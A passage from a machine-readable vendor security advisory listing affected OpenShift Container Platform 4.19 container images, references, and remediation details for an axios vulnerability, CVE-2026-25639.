"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "RHBZ#2438237",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438237"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25639",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25639"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57",
"url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases/tag/v1.13.5",
"url": "https://github.com/axios/axios/releases/tag/v1.13.5"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433",
"url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"
}
],
"release_date": "2026-02-09T20:11:22.374000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-16T10:18:08+00:00",
"details": "For OpenShift Container Platform 4.19 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.redhat.com/en/documentation/openshift_container_platform/4.19/html/release_notes/\n\nYou may download the oc tool and use it to inspect release image metadata for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests may be found at https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags.\n\nThe sha values for the release are as follows:\n\n (For x86_64 architecture)\n The image digest is sha256:b274766f7194a7dc825e335a54078790519c0dbe3431c029fd08dbba1c431855\n\n (For s390x architecture)\n The image digest is sha256:066bfcb590ef6f34106e63861d420a3fdcdebd734bb729668c8c6de59b84c632\n\n (For ppc64le architecture)\n The image digest is sha256:ff14e60b2b4760a6c2578e444b40f457fe2322f5211b1b838078b1fa6ea1b443\n\n (For aarch64 architecture)\n The image digest is sha256:52b1e8cf83dd1a854194212cc94bfe2719afb2e014f7b1a315250a9c7273a600\n\nAll OpenShift Container Platform 4.19 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.redhat.com/en/documentation/openshift_container_platform/4.19/html-single/updating_clusters/index#updating-cluster-cli.",
"product_ids": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:7249"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64",
